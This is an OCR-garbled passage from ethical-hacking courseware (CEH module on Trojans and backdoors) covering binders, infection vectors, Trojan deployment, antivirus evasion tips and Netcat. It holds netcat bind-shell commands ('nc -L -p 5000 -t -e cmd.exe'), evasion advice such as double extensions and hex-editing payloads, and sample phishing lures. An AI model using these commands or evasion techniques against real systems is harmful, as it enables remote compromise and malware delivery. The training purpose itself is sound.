M o d u le 0 6 P a g e 8 S 2
File Name
jJjIxRAYMYPC-INSTALL.MSI
Hb8thc.exe
File Path
File Size
C:\DocumentsandSettings\k-ADes...
C:\Documents and Settings\ .,Des...
4 Mb
379 Kb
Inject To
%apppath%
%apppath%
Extract To
%none%
%none%
►
Plugin Count: 0006
Status : all spread commands unchecked...
FIGURE 6 .6 : K rip to m a tik s c re e n s h o t
5 ------®
A d v a n c e d F ile J o in e r
Advanced File Joiner is software that is used to combine and join various files into a
single file. If you have downloaded multiple pieces of a large file split into smaller files, you may
easily join them together with this tool. For example, you can combine ASCII text files or
combine video files such as MPEG files into a single file if and only if they are of same size,
format, and encoding. This tool cannot be used effectively for joining a file format containing
head information such as AVI, BMP, JPEG, and DOC files. So, for each of these types of file
formats, you have to use specific software join program.
M o d u le 0 6 P a g e 8 5 3
File List
Anti Debugging
Compile Ftes
Event Logs
About
|©| C:\Documents and Settings^
,\Desktop\Music.wav
58
1
nc:\Docurr>ents and SettinosV
\Desktop\iusion_b...
392 Kb
1
Add To File
File P a th :
Execu te:
Yes
FIGURE 6 .7 : A d v a n c e d File J o in e r S c re e n s h o t
M o d u le 0 6 P a g e 8 5 4
S C B L A B ’ s - P r o f e s s io n a l M a lw a r e T o o l
Professional Malware Tool is designed to encrypt (crypter), together (binder),
download (downloader), and files spread (spread).
SC8 LAB'S
P ro fie s s w ia l M alw are Tool
t ,V-‫■« ׳‬
Index | C rypter
Binder
Downloader
S preader
Name
Path
] SCB Lab.,. C :\D ocum entsandS ettings\A dm i...
*“ icuments and Settings\Admi...
Add file
Execute
► Yes
Build!
No
Execute
No
No
Remove file
| The attached files weigh 714 KB
FIGURE 6 .8 : SCB LAB's - P ro fe s s io n a l M a lw a re T o o l S c re e n s h o t
M o d u le 0 6 P a g e 8 5 5
D if f e r e n t W a y s a T r o ja n
G e t in t o
c a n
C E H
a S y s te m
In s ta n t
B ro w s e r an d
M essenger
IRC ( In te rn e t
P hysical
e m a il s o ftw a re
Fake
a p p lic a tio n s
R elay C hat)
Access
bugs
p ro g ra m s
r
\
1
r
2
L e g itim a te " s h r in k w ra p p e d " s o ftw a re
3
4
A tta c h m e n ts
\
5
r
6
\
7
r
8
U n tru s te d site s
N etB IO S
a n d fre e w a re
(F ile S h a rin g )
pa ckaged b y a
s o ftw a re
\
9
D o w n lo a d in g file s ,
ga m es, an d
scre ensave rs fro m
d is g ru n tle d e m p lo y e e
In te rn e t sites
D if f e r e n t W a y s a T r o ja n C a n G e t in t o a S y s t e m
Different access points are used by Trojans to infect the victim's system. With the help
of these points, the Trojan attacks the target system and takes complete control over the
system. They are as follows:
In s ta n t M e s s e n g e r A p p lic a t io n s
The system can get infected via instant messenger applications such as ICQ or Yahoo
Messenger. The user is at high risk while receiving files via the messenger, no matter from
whom or from where. Since there is no file checking utility bundled with instant messengers,
there is always a risk of infection by a Trojan. The user can never be 100% sure who is on the
other side of the computer at any particular moment. It could be someone who hacked a
messenger ID and password and wants to spread Trojans over the hacked friends list.
I R C (In te rn e t R e la y C h a t)
tA
IRC is another method used for Trojan propagation. Trojan.exe can be renamed
something like Trojan.txt (with 150 spaces).exe. It can be received over IRC and, in the
DCC (Direct Client to Client), it will appear as •TXT. The execution of such files will cause
infection. Most people do not notice that an application (.exe) file has a text icon. So before
M o d u le 0 6 P a g e 8 5 6
such things are run, even if it is with a text icon; the extensions must be checked to ascertain
that they are really .TXT files.
9
Do not download any files that appear to be free porn or Internet software. Novice
computer users are often targets of these false offers, and many people on IRC are
unaware of security. Users get infected from porn-trade channels, as they are not
thinking about the risks involved—just how to get free porn and free programs.
i r t ‫ ־‬1‫ !־‬P h y s i c a l A c c e s s
L iJ
0
Restricting physical access is important for a computer's security.
Example:
9
A user's friend wants to have physical access to his system. The user might sneak
into his friend's computer room in his absence and install a Trojan by copying the
Trojan software from his disk onto the hard drive.
9
Autostart is another way to infect a system while having physical access. When a CD
is placed in the CD-ROM tray, it automatically starts with a setup interface. An
example of the Autorun.inf file that is placed on such CDs:
[autorun]
open=setup.exe
icon=setup.exe
9
Trojan could be run easily by running a real setup program.
9
Since many people do not know about this CD function, their machine might get
infected, and they would not understand what happened or how it was done.
9
The Autostart functionality should be turned off by doing the following:
Start ‫ >־־‬Settings ‫ >־‬Control Panel -> System
Properties ■) Settings
Device Manager ■
‫ >־‬CDROM ‫>־־‬
Once there, a reference to Auto Insert Notification will be seen. (It checks approximately
once per second whether a CD-ROM has been inserted, or changed, or not changed.) To
avoid any problems with this function, it should be turned off.
B r o w s e r a n d E m a il S o ftw a re B u g s
Users do not update their software as often as they should, and many attackers take
advantage of this well-known fact. Imagine an old version of Internet Explorer being
used. A visit to a malicious site will automatically infect the machine without downloading or
executing any program. The same scenario occurs while checking email with Outlook Express or
some other software with well-known problems. Again, the user's system will be infected
without even downloading an attachment. The latest version of the browser and email
software should be used, because it reduces the risk of these variations.
M o d u le 0 6 P a g e 8 5 7
9
Check the following sites to understand how dangerous these bugs are, all due to the
use of an old version of the software:
9
http://www.guninski.com/browsers.html
9
http://www.guninski.com/netscape.html
F a k e P ro g ra m s
9
Attackers can easily lure a victim into downloading free programs that are suitable for
their needs, and loaded with features such as an address book, access to check several
POP3 accounts, and many other functions that make it even better than the currently
used email client.
9
The victim downloads the program and marks it as TRUSTED, so that the protection
software fails to alert him or her of the new software being used. The email and POP3
account passwords are mailed directly to the attacker's mailbox without anyone
noticing. Cached passwords and keystrokes can also be mailed. The aim is to gather
ample information and send it to the attacker.
9
In some cases, an attacker may have complete access to a system, but what the attacker
does depends on his or her ideas about how to use the hidden program's functions.
While sending email and using port 25 or 110 for POP3, these could be used for
connections from the attacker's machine (not at home, of course, but from another
hacked machine) to connect and use the hidden functions they implemented in the
freeware program. The idea here is to offer a program that requires a connection with a
server be established.
9
Attackers thrive on creativity. Consider an example where a fake audio galaxy, which is
a site for downloading MP3, is given. An attacker generates such a site by using 15-gb
space on his system to place a larger archive there for the MP3. In addition, some other
systems are also configured in the same fashion. This is done to fool users into thinking
that they are downloading from other people who are spread across the network. The
software acts as a backdoor and will infect thousands of naive users using ADSL
connections.
9
Some fake programs have hidden codes, but still maintain a professional look. These
websites link to anti-Trojan software, thus fooling users into trusting them. Included in
the setup is readme.txt. This can deceive almost any user, so proper attention needs to
be given to any freeware before it is downloaded. This is important because this
dangerous method is an easy way to infect a machine via Trojans hidden in the
freeware.
M o d u le 0 6 P a g e 8 5 8
— .
S h r in k - W r a p p e d S o ftw a re
‫| י‬
Legitimate "shrink-wrapped" software packaged by a disgruntled employee can
contain Trojans.
V ia A tta c h m e n ts
When unaware web users receive an email saying they will get free porn or free
Internet access if they run an attached .exe file, they might run it without completely
understanding the risk to their machines.
0
Example:
0
A user has a good friend who is carrying out some research and wants to know
about a topic related to his friend's field of research. He sends an email to his friend
asking about the topic and waits for a reply. The attacker targeting the user also
knows his friend's email address. The attacker will simply code a program to fake the
email From: field and make it appear to be the friend's email address, but it will
include the TROJANED attachment. The user will check his email, and see that his
friend has answered his query in an attachment, and download and run it without
thinking that it might be a Trojan. The end result is an infection.
0
Trash email with the subject line, "Microsoft IE Update," without viewing it.
0
Some email clients, such as Outlook Express, have bugs that automatically execute
the attached files.
U n t r u s t e d S it e s a n d F r e e w a r e S o f t w a r e
A site located at a free web space provider or one just offering programs for
illegal activities can be considered suspicious.
0
0
There are many underground sites such as NeuroticKat Software. It is highly risky to
download any program or tool located on such a suspicious site that can serve as a
0
conduit for a Trojan attack on a victim's computer. No matter what software you use,
are you ready to take that risk?
0
Many sites are available that have a professional look and contain huge archives. These
sites are full of feedback forms and links to other popular sites. Users must take the
time to scan such files before downloading them, so that it can be determined whether
or not they are coming from a genuine site or a suspicious one.
0
Software such as mIRC, ICQ, PGP, or any other popular software must be downloaded
from its original (or official dedicated mirror) site, and not from any other websites that
may have links to download supposedly the same software.
0
Webmasters of well-known security portals, who have vast archives with various
"hacking" programs, should be responsible for the files they provide and scan them
often with anti-virus and anti-Trojan software to guarantee the site to be "free of
Trojans and viruses." Suppose an attacker submits a program infected with a Trojan,
M o d u le 0 6 P a g e 8 5 9
0
e.g., a UDP flooder, to the webmaster for the archive; if the webmaster is not alert, the
attacker may use the webmaster's irresponsibility to infect the site's files with a Trojan.
0
Users who deal with any kind of software or web application should scan their systems
on a daily basis. If they detect any new file, it should be examined. If any suspicion arises
regarding the file, it must be forwarded to software detection labs for further analysis.
0
It is easy to infect machines using freeware programs. "Free is not always the best" and
hence these programs are hazardous for systems.
N e t B I O S ( F ile S h a r in g )
If port 139 on the system is open, i.e., file sharing is enabled, it can be used by others
to access the system, install trojan.exe, and modify a system's file.
0
The attacker can also use a DoS attack to shut down the system and force a reboot, so
the Trojan can restart itself immediately. To block file sharing in the WinME version, go
to:
0
Start ‫ >־־‬Settings -> Control Panel
Network ‫ >־־‬File and Print Sharing
0
Uncheck the boxes there. This will prevent NetBIOS abuse.
D o w n lo a d in g
Downloading files, games, and screensavers from Internet sites can be dangerous.
M o d u le 0 6 P a g e 8 6 0
H o w
to
D
e p lo y
a
T r o j a n
c
(crtifwd
E H
IU mjI Km Im
M a jo r Trojan A ttack Paths:
» User clicks on the malicious link
8 User opens malicious email attachments
Attacker installs
the Trojan infecting
his machine
Trojan Server
(Russia)
Trojan is sent to the victim
H o w to D e p lo y a T r o ja n
A Trojan is the means by which an attacker can gain access to the victim's system. In
order to gain control over the victim's machine, an attacker creates a Trojan server, and then
sends an email to a victim containing a link to the Trojan server. Once the victim clicks on the
link sent by the attacker, it connects him or her directly to the Trojan server. The Trojan server
sends a Trojan to the victim system. The attacker installs the Trojan, infecting the victim's
machine. As a result, victim is connected to the attack server unknowingly. Once the victim
connects to an attacker server, the attacker takes complete control over the victim's system
and performs any action the attacker chooses. If the victim carries out any online transaction or
purchase, then the attacker can easily steal sensitive information such as credit card details,
account information, etc. In addition, attackers can also use the victim's machine as the source
for launching attacks on other systems.
Computers typically get infected by users clicking on a malicious link or opening an email
attachment that installs a Trojan on their computers that serves as a back door to criminals who
can then command the computer to send spam email.
M o d u le 0 6 P a g e 8 6 1
ru Zdt
&
Bi‫**!*־‬
Subject:
Computers typically get infected by clicking on a
malicious link or opening an e-m ail attachm ent
tha t installs a Trojan on the ir computers that
serves as a back door to crim inals who can then
command the com puter to send spam email
vi** Toob h»smo« noo
Hffty Al
Apo«
x
Orlrfa
fat • f t 6
O O I■
vD
« Odor m ?27867
A p ple Store
Call 1-800-MY-APPLE
D ear C u sto m er
The Trojan connects to
the attack server
Link to Trojan Server
xlfnakechangestoyelr
To view the most up-to-date status 8nd|
Apple Online Store order, visit online y|ur Qrc^r Siatus. |
4
V ic tim
Attacker installs
the Trojan infecting
his machine
You car. aJso contact Apple Store Customer Servicc a: 1-800-576-2775 or vut
mere nfo:1r.aCoc.
Immediately connects to
Trojan server in Russia
cniat for
Attacker sends an email
to victim containing link
to Trojan server
Internet
Trojan Server
(Russia)
la
Trojan Is sent to the victim
FIGURE 6 .9 : D ia g ra m m a tic a l re p re s e n ta tio n o f d e p lo y in g a T ro ja n in v ic tim s s y s te m
M o d u le 0 6 P a g e 8 6 2
E v a d in g
A n t i- V ir u s T e c h n iq u e s
Break the Trojan file into multiple
pieces and zip them as single file
Never use Trojans
downloaded from the
web (antivirus can
detect these easily)
ALWAYS write your own
Trojan and embed it into
an application
Change the content of the
Trojan using hex editor and
also change the checksum
and encrypt the file
Change Trojan's syntax:
«
C o n v e rt an EXE to VB s c rip t
e
Change .EXE e x te n s io n to
.DOC.EXE, .PPT.EXE o r .PDF.EXE
(W in d o w s h id e "k n o w n
e x te n s io n s ", by d e fa u lt, so it show s
up o n ly .DOC, .PPT and .PDF)
Copyright © by EG-Gouncil. All Rights Jte$ervfei;Reproduction is Strictly Prohibited.
E v a d in g A n t iv ir u s T e c h n iq u e s
The following are the various techniques used by Trojans, viruses, and worms to
evade most of antivirus software:
1. Never use Trojans downloaded from the web (antivirus detects these easily).
2. Write your own Trojan and embed it into an application.
3. Change the Trojan's syntax:
0
Convert an EXE to VB script
© Convert an EXE to a DOC file
Q
Convert an EXE to a PPT file
4. Change the checksum.
5. Change the content of the Trojan using a hex editor.
6
. Break the Trojan file into multiple pieces.
M o d u le 0 6 P a g e 8 6 3
So far, we have discussed various concepts of Trojans and the way they infect the
system. Now we will discuss various types of Trojans that are used by attackers for gaining
sensitive information through various means.
J
^—
Trojan Concepts
Countermeasures
Trojans Infection
Anti-Trojan Software
Types of Trojans
y
‫ )׳‬Penetration Testing
v‫ ׳‬-
I
1
Trojan Detection
This section covers various types of Trojans such as command-shell Trojans, document Trojans,
email Trojans, botnet Trojans, proxy server Trojans, and so on.
M o d u le 0 6 P a g e 8 6 4
T y p e s
/
i
VNC
Trojan
\
CEH
o f T r o j a n s
/HTTP/HTTPS\ /*ICMP \
: :Trojan : ;
Trojan
:
/ D a ta Hiding*. /*Destructive**. /*Docum ent
;
Trojan
: .‫־‬
Trojan
: !
Trojan
a
a
T y p e s o f T ro ja n s
Various types of Trojans that are intended for various purposes are available. The following is
a list of types of Trojans:
0
VNC Trojan
© Proxy Server Trojan
0
HTTP/HTTPS Trojan
0
Botnet Trojan
0
ICMP Trojan
0
Covert Channel Trojan
0
Command Shell Trojan
0
SPAM Trojan
0
Data Hiding Trojan
0
Credit Card Trojan
0
Destructive Trojan
0
Defacement Trojan
© Document Trojan
0
E-banking Trojan
© GUI Trojan
0
Notification Trojan
© FTP Trojan
0
Mobile Trojan
© E-mail Trojan
0
MAC OS X Trojan
© Remote Access Trojan
M o d u le 0 6 P a g e 8 6 5
Ethical Hacking a n d C o u n te rm e a s u re s
T ro ja n s a n d B ac k d o o rs
Exam 3 1 2-50 C ertified Ethical H acker
C o m m an d S hell T ro jan s
CEH
J
Command shell Trojan gives rem ote control o f a command shell on a victim's machine
J
Trojan server is installed on the victim 's machine, which opens a po rt fo r attacker to connect.
The client is installed on the attacker's machine, which is used to launch a command shell on the
victim's machine
C o m
m
a n d
S h e ll T r o ja n s
T h e c o m m a n d s h e ll T r o j a n g i v e s r e m o t e c o n t r o l o f a c o m m a n d s h e l l o n a v i c t i m ' s
m a c h i n e . T h e T r o j a n s e r v e r is i n s t a l l e d o n t h e v i c t i m ' s m a c h i n e , w h i c h o p e n s a p o r t f o r t h e
a t t a c k e r t o c o n n e c t . T h e c l i e n t is i n s t a l l e d o n t h e a t t a c k e r ' s m a c h i n e , w h i c h is u s e d t o l a u n c h a
c o m m a n d sh e ll o n t h e v ic t i m 's m a c h in e .
C :>
n c < ip >

C :>
-t
nc
-e
-L
-p

c m d .e x e
FIGURE 6.10: Attacker launching command shell Trojan in victim 's machine
M o d u le 0 6 P ag e 8 66
Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0UnCil
All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
Command Shell Trojan: Netcat
c:\>nc.exe -h
[▼1.10 NT]
connect to scanewhere : nc ]‫־‬options] hostname port[s] [ports[ ...
listen for inbound:
nc -1 -p port [options] [hostname] [port]
options:
-d
detach from console, stealth mode
-e prog
inbound program to exec [dangerous ! !]
-g gateway
source-routing hop point [s] , up to 8
—
G num
source-routing pointer: 4, 8, 12, ...
-h
this cruft
- i secs
delay interval for lines sent, ports scanned
‫־‬1
listen mode, for inbound connects
listen harder, re-listen on socket close
-L
-n
numeric-only IP addresses, no DNS
-o file
hex dump of traffic
-p port
local port number
randomize local and remote ports
-r
-a addr
local source address
-t
answer TELNET negotiation
-u
UDP mode
‫▼־־‬
verbose [use twice to be more verbose]
-w secs
timeout for connects and final net reads
-z
zero-l/O mode [used for scanning]
port numbers can be individual or ranges: m‫־‬n [inclusive]
C:\>
CEH
—
■
C o m
m
a n d
S h e ll T r o ja n :
N e tc a t
U s in g N e t c a t , a n a t t a c k e r c a n s e t u p a p o r t o r a b a c k d o o r t h a t w i l l a l l o w h i m o r h e r t o
t e l n e t i n t o a DOS s h e l l. W i t h a s i m p l e c o m m a n d s u c h as C : \ > n c -L - p 5 0 0 0 - t -e c m d . e x e , t h e
a tta c k e r
can
b in d
p o rt
5000.
W ith
N e tc a t,
th e
user
can
cre a te
o u tb o u n d
or
in b o u n d
c o n n e c t i o n s , TCP o r U D P , t o o r f r o m a n y p o r t . It p r o v i d e s f o r f u l l D N S f o r w a r d / r e v e r s e c h e c k i n g ,
w it h a p p r o p r ia t e w a r n in g s . A d d it io n a lly , it p r o v id e s t h e a b ility t o use a n y local s o u rc e p o r t, a n y
lo c a lly c o n fig u r e d n e t w o r k s o u rc e a d d re s s , a n d it c o m e s w it h b u ilt - in p o r t - s c a n n in g c a p a b ilitie s .
It h a s a b u i l t - i n l o o s e s o u r c e - r o u t i n g c a p a b i l i t y a n d c a n r e a d c o m m a n d - l i n e a r g u m e n t s f r o m
s ta n d a rd
in p u t. A n o th e r fe a tu re
is t h e
a b ility to
le t a n o th e r p ro g ra m
respond
to
in b o u n d
c o n n e c tio n s ( a n o t h e r p ro g r a m s e rv ic e e s ta b lis h e d c o n n e c tio n s ).
In t h e s i m p l e s t u s a g e , " n c h o s t p o r t " c r e a t e s a TCP c o n n e c t i o n t o t h e g i v e n p o r t o n t h e g i v e n
t a r g e t h o s t . T h e s t a n d a r d i n p u t is t h e n s e n t t o t h e h o s t , a n d a n y t h i n g t h a t c o m e s b a c k a c r o s s
t h e c o n n e c t i o n is s e n t t o t h e s t a n d a r d o u t p u t . T h is c o n t i n u e s i n d e f i n i t e l y , u n t i l t h e n e t w o r k s i d e
o f t h e c o n n e c t i o n s h u t s d o w n . T h is b e h a v i o r is d i f f e r e n t f r o m m o s t o t h e r a p p l i c a t i o n s , w h i c h
s h u t e v e ry th in g d o w n
a nd e x it a fte r an e n d -o f-file o n th e
s ta n d a rd
i n p u t . N e t c a t c a n a ls o
f u n c t i o n as a s e r v e r b y l i s t e n i n g f o r i n b o u n d c o n n e c t i o n s o n a r b i t r a r y p o r t s , a n d t h e n d o i n g t h e
s a m e r e a d i n g a n d w r i t i n g . W i t h m i n o r l i m i t a t i o n s , N e t c a t d o e s n o t r e a l l y c a r e i f i t r u n s in c l i e n t
o r s e r v e r m o d e ; i t s till m o v e s d a t a b a c k a n d f o r t h
u n t i l t h e r e is n o n e l e f t . In e i t h e r m o d e ,
s h u t d o w n c a n b e f o r c e d a f t e r a c o n f i g u r a b l e t i m e o f i n a c t i v i t y o n t h e n e t w o r k s id e .
M o d u le 0 6 P ag e 8 67
Exam 3 1 2 -5 0 C ertified Ethical H acker
F e a tu re s :
9
O u t b o u n d o r i n b o u n d c o n n e c t i o n s , TCP o r U D P , t o o r f r o m a n y p o r t
9
Full D N S f o r w a r d / r e v e r s e c h e c k i n g , w i t h a p p r o p r i a t e w a r n i n g s
9
A b i l i t y t o u s e a n y lo c a l s o u r c e p o r t
9
A b il it y t o use a n y lo c a lly c o n f ig u r e d n e t w o r k s o u rc e a d d re s s
9
B u ilt-in p o r t- s c a n n in g c a p a b ilitie s , w it h r a n d o m iz e r
9
B u ilt-in lo o s e s o u r c e - r o u tin g c a p a b ility
9
Can re a d c o m m a n d - li n e a r g u m e n t s f r o m s ta n d a r d in p u t
9
S l o w - s e n d m o d e , o n e l in e e v e r y N s e c o n d s
9
H ex d u m p o f t r a n s m it t e d a n d re c e iv e d d a ta
9
O p tio n a l a b ility t o le t a n o th e r p ro g r a m s e rv ic e e s ta b lis h c o n n e c tio n s
9
O p t i o n a l t e l n e t - o p t i o n s r e s p o n d e r u s i n g t h e c o m m a n d n c -I - p 2 3 - t -e c m d . e x e
9
W h e r e 2 3 is t h e p o r t f o r t e l n e t , -I o p t i o n is t o l i s t e n , -e o p t i o n is t o e x e c u t e , - t o p t i o n
te lls N e tc a t to h a n d le a n y te ln e t n e g o tia tio n th e c lie n t m ig h t e x p e c t
N e t c a t is a u t i l i t y
used fo r re a d in g a n d
w ritin g
th e
n e tw o rk s
t h a t s u p p o r t TCP a n d
UDP
p r o t o c o l s . It is a T r o j a n t h a t is u s e d t o o p e n e i t h e r t h e TCP o r U D P p o r t o n a t a r g e t s y s t e m a n d
h a c k e rs w it h th e h e lp o f T e ln e t g a in th e access o v e r th e s y s te m .
Command Prom pt
c :\> n c .e x e
-h
[ v l . 1 0 NT]
c o n n e c t t o s o m e w h e re :
l i s t e n f o r in b o u n d :
o p t io n s :
-d
-e p ro g
- g g a te w a y
-G num
-h
- i secs
-1
-L
-n
-o f i l e
‫־‬P p o rt
-r
-s addr
- t
-u
-v
-w s e c s
-z
▲
n c [ - o p t i o n s ] h o s tn a m e p o r t [ s ] [ p o r t s ] . . .
n c - 1 - p p o r t [ o p t i o n s ] [ h o s tn a m e ] [ p o r t ]
d e t a c h f r o m c o n s o le , s t e a l t h m ode
in b o u n d p r o g r a m t o e x e c [ d a n g e r o u s ! ! ]
s o u r c e - r o u tin g h op p o i n t [ s ] , up t o 8
s o u r c e - r o u tin g p o in t e r : 4 , 8 , 1 2 , . . .
t h is c r u ft
d e la y i n t e r v a l f o r l i n e s s e n t , p o r t s sc a n n e d
l i s t e n m o d e , f o r in b o u n d c o n n e c t s
l i s t e n h a r d e r , r e - l i s t e n on s o c k e t c lo s e
n u m e r i c - o n l y I P a d d r e s s e s , n o DNS
h e x dum p o f t r a f f i c
lo c a l p o r t num ber
r a n d o m iz e l o c a l a n d r e m o te p o r t s
l o c a l s o u rc e a d d re s s
a n s w e r T E IU E T n e g o t i a t i o n
UDP m ode
v e r b o s e [ u s e t w i c e t o b e m o re v e r b o s e ]
t im e o u t f o r c o n n e c ts a n d f i n a l n e t r e a d s
z e r o - l / O m ode [ u s e d f o r s c a n n in g ]
p o r t n u m b e rs c a n b e i n d i v i d u a l o r r a n g e s :
m -n
■
■
[ in c lu s iv e ]
C :\>
FIGURE 6.11: Netcat screenshot
M o d u le 0 6 P ag e 8 68
G U I T ro ja n : M o S u cker
MoSucker 3.0
Selected Server: |z:\C&tv8 Module 06 Trojans and Backdoors\Trojans Type [
Server ID:
Cypher Key:
tfctim's Name:
Server Name(s):
Extension(*):
Cormecbon-eort:
15017MQWEY3C:4264200TPGNDEVC ‫־־‬
TWQPCUL25873IVFCSJQK13761
|victm
} O
£ ‫ ב‬Close
]
‫ש‬
‫ש‬
‫ש‬
kerne!32,msc0nfig,vvinexec32,netconfig‫״‬
exe,p!f‫״‬t>at,A,jpe,com,bpq,xtr,txp,
0
‫ש‬
|4288|
W Prevent same server multHnfecbons (recommended)
‫ש‬
You may select a windows icon to assooate
with your custom file extension/s.
Sead
Save
G U I T r o ja n :
M
o S u c k e r
S ource: h t t p : / / w w w . d a r k - e . c o m
M o S u c k e r is a V i s u a l B a s ic T r o j a n . M o S u c k e r ' s e d i t s e r v e r p r o g r a m le ts t h e i n f e c t i o n r o u t i n e b e
c h a n g e d a n d n o t i f i c a t i o n i n f o r m a t i o n s e t. M o S u c k e r c a n a u t o l o a d w i t h t h e s y s t e m . i n i a n d / o r
th e re g is tr y . U n lik e a n y o t h e r T r o ja n , M o S u c k e r can be s e t t o r a n d o m ly c h o o s e w h ic h m e t h o d
t o a u t o l o a d . It c a n n o t i f y c e ll p h o n e s v i a S M S in G e r m a n y o n l y . M u S u c k e r ' s e d i t s e r v e r c a n g a i n
X n u m b e r o f k i l o b y t e s (X is e i t h e r a s t a t i c n u m b e r o r i t is r a n d o m e a c h t i m e ) . T h e s t a n d a r d e r r o r
m e s s a g e f o r M o S u c k e r is " Z i p f i l e is d a m a g e d , t r u n c a t e d , o r h a s b e e n c h a n g e d s i n c e i t w a s
c re a te d .
If y o u
d o w n lo a d e d
M o S u c k e r s u g g e s ts t o
th is file , t r y
n a m e th e
s e rve r:
d o w n lo a d in g
a g a in ."
H ere
is a lis t o f f i l e
names
M S N E T C F G .e x e , u n i n 0 6 8 6 . e x e , C a lc . e x e , H T T P .e x e ,
M S W I N U P D . e x e , A r s . e x e , N E T U P D A T E .e x e , a n d R e g is t e r . e x e .
Server Features:
0
C hat w ith v ic tim
Q
C lip b o a rd m a n a g e r
©
C lo s e /re m o v e s e rv e r
e
C o n tro l m o u s e
9
C ra s h S y s t e m File M a n a g e r
M o d u le 0 6 P ag e 8 6 9
0
G e t p a s s w o rd s e n te r e d b y user, s y s te m in fo
0
H id e /S h o w s ta rt b u tto n , s y s te m tra y , ta s k b a r
0
K e y lo g g e r
0
M i n i m i z e all w i n d o w s
0
O p e n /c lo s e C D -R O M d riv e
0
P in g s e r v e r
0
P op-u p s ta rtm e n u
0
P rocess m a n g e r
0
S h u td o w n /R e b o o t/S ta n d b y /L o g o ff/D o s m o d e se rve r
0
S y s te m keys o n / o f f
0
W in d o w m anager
About
| O p tio n s | S 3
_
‫א‬
£ Nt Q
M isc stuff
Inform ation
File rela ted
S y stem
5
‫ ' ׳־‬/ ‫׳‬
‫ ׳‬f t ‫;׳‬
S p y rela ted
F u n stuff I
version 3.0
F u n stuff II
Live c a p tu re
wwui.mas uckcr.th
FIGURE 6.12: MoSucker screenshot
M o d u le 0 6 P ag e 8 7 0
All R ights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
M o S u c k e r 3 .0
*
S e le c te d S e r v e r
|z :\C E H v 8 M o d u le 0 6 T r o ja n s a n d B a c k d o o r s \T r o ja n s T y p e
C clC lo s e
Name/Port
Server ID:
Password
Autostart
Cypher Key:
Notification 1
Victim's Name:
Notification 2
Server Name(s):
Options
Extension (s):
Keylogger
Connection-gort:
[‫י‬/
O
‫ש‬
‫ש‬
‫ש‬
1501704QWEYX:4264200TPGNDEVC
TWQPCUL25873IVFCSJQK13761
Victim
kemel32‫׳‬msc0nfigrwinexec32,netconfig‫׳‬
e x e .p i^ b a t^ lijp e .c o m ^ p q .x trjtx p ,
Events
Bind Files
|
‫ש‬
‫ש‬
4288|
Prevent same server multi-infections (recommended)
Plug-ins/Kill
Fake Error
<
>
You may select a windows icon to associate
with your custom file extension/s.
File Properties
Icons
Read
Save
Exit
FIGURE 6.13: MoSucker showing victim 's name and connection port
M o d u le 0 6 P ag e 871
GUI Trojan: Jumper and Biodox
CEH
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is S trictly Prohibited.
G U I T r o ja n : J u m
p e r
a n d
B io d o x
J u m p e r is a m a l i c i o u s m a l w a r e p r o g r a m t h a t p e r f o r m s m a n y f u n c t i o n s t o d o w n l o a d
m a l i c i o u s m a l w a r e f r o m t h e I n t e r n e t . A t t a c k e r s u s e t h i s j u m p e r T r o j a n t o g e t s e n s i t i v e d a t a lik e
f i n a n c i a l i n f o r m a t i o n f r o m t h e u s e r ' s s y s t e m . It a ls o d o w n l o a d s a d d i t i o n a l d o w n l o a d s f o r t h e
a tta c k e r t o be a b le t o access th e s y s te m re m o te ly .
G e n e r a l l y , t h e B I O D O X OE E d i t i o n . e x e f i l e s h o u l d b e in t h e C : \ W i n d o w s \ S y s t e m 3 2 f o l d e r ; i f i t
h a s b e e n f o u n d e l s e w h e r e , t h e n i t is a T r o j a n . O n c e t h e c o m p u t e r g e t s i n f e c t e d b y t h e B io d o x ,
th e s y s te m p e r f o r m a n c e d e c re a s e s . T h e s c re e n s a v e r g e ts c h a n g e d a u to m a tic a lly . C o n tin u o u s
a n n o y in g a d v e r t is e m e n t p o p -u p s a p p e a rin g o n th e c o m p u t e r can be t r e a te d
as o n e o f t h e
s y m p to m s o f th is T ro ja n .
ftodox Open Source t
L'J [systempr.
D umm
PID
0
4
432
$00
li-Jcsss-eie
,m y * ■ r
■‫■׳‬
544
552
MO
628
MO
648
J 'r e . ‫־‬
.Y .
S36
UsvOwsteJie we
1‫•* |י‬.cfcott txt 992
UtIsvetwst n r 1016
3 r.cN > st txt
244
296
_Jr.ch0it txt 360
Status - w e eru fu ly
System
Sy»tem
System
System
System
System
System
System
System
System
System
System
System
System
System
System
System
" ‫ " ׳ ׳‬0‫ ׳‬V
0
0
929792
5*01632
7430144
4t496*«
» ‫ ״‬,
. 1
•
Non*
a
Normal
Norm■
6287360
7188480
Normal
10•}1632
Norm■
Norma(
4612800
64114J2
7192576
9965568
7016448
33181696
12562432
12091392
S0rr\»
Norma(
Norm•
Norm■
Norn■
Norm■
Normal
M
Clear Applicator Lht
FIGURE 6.13: Screenshots showing Biodox and Jumper
D o cu m en t T ro jan s
VIA LETTER
John Stevens
Royal Communications Company
445 152th Street S.W.
Washington, DC 20554
F e c E x
S eptem ber 2, 2012
CEH
!Be!
A tta c k e r
RE: Fedex Shipment Airw ay Bill Number: 867676340056
Dear M r. Stevens:
We have received a package addressed to you at the value of USD 2,300.
The custom duty has not been paid for this shipment which is listed as
Apple iM ac 24‫ ׳‬Computer.
Attacker embeds Trojan into
a W ord docum ent and infects
victim computer
Please call us at Fedex at 1800-234-446 Ext 345 or e-mail me at
[email protected] regarding this shipment.
Please visit our Fedex Package Tracking Website to see more details
about this shipment and advice us on how to proceed. The website
link is attached with this letter.
V ic tim 's
S ystem
T ro ja n e m b e d d e d in
Package
W o rd d o c u m e n t
Sincerely,
M ichelle Roberts
Customer Service Representative
International Shipment and Handling
Fedex Atlanta Division
Tel: 1800-234-446 Ext 345
http://www.fedex.com
[email protected]
Trojan is executed as v ic tim opens th e
docu m en t and clicks on Trojan package
D o c u m e n t T r o ja n s
M o s t u se rs u s u a lly h a v e t h e t e n d e n c y t o u p d a t e t h e i r o p e r a t in g s y s te m b u t n o t t h e
a p p lic a tio n th e y
use re g u la rly . A tta c k e rs ta k e th is o p p o r t u n it y t o
in s ta ll d o c u m e n t T ro ja n s .
A t t a c k e r s u s u a l l y e m b e d a T r o j a n i n t o a d o c u m e n t a n d t r a n s f e r i t in t h e f o r m o f a n a t t a c h m e n t
